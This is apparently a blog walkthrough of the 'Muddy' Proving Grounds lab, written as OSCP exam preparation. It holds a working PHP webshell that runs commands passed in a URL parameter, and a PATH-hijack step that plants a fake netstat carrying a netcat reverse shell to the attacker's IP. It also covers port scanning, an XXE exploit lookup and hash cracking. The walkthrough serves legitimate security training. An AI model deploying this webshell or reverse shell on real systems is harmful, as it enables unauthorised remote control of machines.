Proving grounds: Muddy

Al1z4deh:~# echo "Welcome"
5 min read · Dec 4, 2022

Today we will take a look at Proving Grounds: Muddy. My purpose in sharing this post is to prepare for the OSCP exam, and to show you the way if you get stuck. Please try to understand each step and take notes.

  • Network scan
└─# nmap -Pn -p- -sS --min-rate 10000 192.168.168.161
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-04 09:43 EST
Warning: 192.168.168.161 giving up on port because retransmission cap hit (10).
Stats: 0:00:22 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 77.60% done; ETC: 09:43 (0:00:07 remaining)
Nmap scan report for 192.168.168.161
Host is up (0.092s latency).
Not shown: 59594 closed tcp ports (reset), 5936 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
80/tcp open http
111/tcp open rpcbind
8888/tcp open sun-answerbook
  • Apache

Add the target's IP address and the muddy.ugc hostname to the /etc/hosts file:

└─# cat /etc/hosts 
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
192.168.168.161 muddy.ugc
  • WSGIServer 0.1

Searching for the name of the framework behind that server (Ladon) shows a public exploit, an XML External Entity (XXE) injection:

└─# searchsploit Ladon
---------------------------------------------------------------------- ------------------------
 Exploit Title                                                        |  Path
---------------------------------------------------------------------- ------------------------
Ladon Framework for Python 0.9.40 - XML External Entity Expansion     | xml/webapps/43113.txt
---------------------------------------------------------------------- ------------------------
Shellcodes: No Results

┌──(root㉿kali)-[~/ctf/muddy]
└─# searchsploit -m xml/webapps/43113.txt
Exploit: Ladon Framework for Python 0.9.40 - XML External Entity Expansion
URL: https://www.exploit-db.com/exploits/43113
Path: /usr/share/exploitdb/exploits/xml/webapps/43113.txt
File Type: Python script, ASCII text executable
Copied to: /root/ctf/muddy/43113.txt

I will use Burp Suite here to send the SOAP request. The exploit's XML payload is written for a sample service, so you need to replace the service, method and parameter names in it with the ones this instance exposes; the Ladon web interface on port 8888 lists them. The entity declared in the DOCTYPE is expanded into the parameter value, and if the method echoes that parameter back, the file named in the entity comes back in the response.

Webdav

During the directory scan a webdav path appeared. Browsing to it prompts for a username and password.

I searched the internet to see where the password could be obtained from. Result:

Crack the password

Hashcat

hashcat.exe -m 1600 -a 0 passwd.txt rockyou.txt

Mode 1600 is Apache's $apr1$ MD5 format, the one htpasswd writes; passwd.txt holds the hash from the previous step and rockyou.txt is the wordlist.

Let's upload a webshell using the cracked username and password.

Webshell

<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
// Run whatever arrives in ?cmd= and print its output inside the <pre> block.
if(isset($_GET['cmd']))
{
system($_GET['cmd']);
}
?>
</pre>
</body>
</html>

Reverse shell

Linpeas

LinPEAS shows that netstat is looked up in a folder we can write to. So let's replace it with a script of our own that connects back to us, and wait for it to be run:

www-data@muddy:/dev/shm$ echo "nc 192.168.49.168 4444 -e /bin/bash" > netstat
www-data@muddy:/dev/shm$ chmod 777 netstat

Start a listener on port 4444 on the attacking machine before the fake netstat gets executed. Note that the -e option only exists in netcat builds that support it (traditional nc, ncat); if the target's nc lacks it, use a bash /dev/tcp redirection instead.

And now we are root.

"If you have any questions or comments, please do not hesitate to write. Have a good day."
